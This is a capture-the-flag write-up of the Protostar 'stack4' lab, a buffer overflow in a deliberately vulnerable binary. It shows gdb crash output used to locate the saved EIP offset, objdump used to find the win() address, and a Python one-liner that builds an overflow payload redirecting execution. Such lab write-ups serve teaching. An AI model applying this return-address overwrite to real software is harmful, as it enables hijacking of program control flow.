Protostar – stack4
This exercise looks at overwriting the EIP, which sits behind the EBP (and possibly some padding), so we’ll need to determine where EIP is. Let’s piss all over the stack:
0.08 0.14 0.10 root kali ➜ ~ pwgen 80 as6xoz0aengohBe0sieNg1ifoh7moeNgiZi5tahkeif2ohD5shaeKohbi5thoohie5keona2se0aib4g gdb$ run as6xoz0aengohBe0sieNg1ifoh7moeNgiZi5tahkeif2ohD5shaeKohbi5thoohie5keona2se0aib4g Program received signal SIGSEGV, Segmentation fault. --------------------------------------------------------------------------[regs] EAX: 0xBFFFF740 EBX: 0xB7FD7FF4 ECX: 0xBFFFF740 EDX: 0xB7FD9334 o d I t s Z a P c ESI: 0x00000000 EDI: 0x00000000 EBP: 0x61306573 ESP: 0xBFFFF790 EIP: 0x67346269 CS: 0073 DS: 007B ES: 007B FS: 0000 GS: 0033 SS: 007BError while running hook_stop: Cannot access memory at address 0x67346269 0x67346269 in ?? () gdb$
0x67346269 is “g4bi”, the end of the string we shoved in. Let’s find out win() address:
user@protostar:/opt/protostar/bin$ objdump -S stack4 | grep "win" 080483f4 <win>:
Fun, let’s add that in place of the “g4bi” string:
user@protostar:/opt/protostar/bin$ python -c 'print("......ohbi5thoohie5keona2se0a\xf4\x83\x04\x08");' > /tmp/stack4_trick user@protostar:/opt/protostar/bin$ gdb stack4 GNU gdb (GDB) 7.0.1-debian Copyright (C) 2009 Free Software Foundation, Inc. License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html> This is free software: you are free to change and redistribute it. There is NO WARRANTY, to the extent permitted by law. Type "show copying" and "show warranty" for details. This GDB was configured as "i486-linux-gnu". For bug reporting instructions, please see: <http://www.gnu.org/software/gdb/bugs/>... Reading symbols from /opt/protostar/bin/stack4...done. gdb$ run < /tmp/stack4_trick code flow successfully changed Program received signal SIGSEGV, Segmentation fault. --------------------------------------------------------------------------[regs] EAX: 0x0000001F EBX: 0xB7FD7FF4 ECX: 0xB7FD84C0 EDX: 0xB7FD9340 o d I t s Z a P c ESI: 0x00000000 EDI: 0x00000000 EBP: 0x61306573 ESP: 0xBFFFF794 EIP: 0x00000000 CS: 0073 DS: 007B ES: 007B FS: 0000 GS: 0033 SS: 007BError while running hook_stop: Cannot access memory at address 0x0 0x00000000 in ?? () gdb$
Angel.
Leave a comment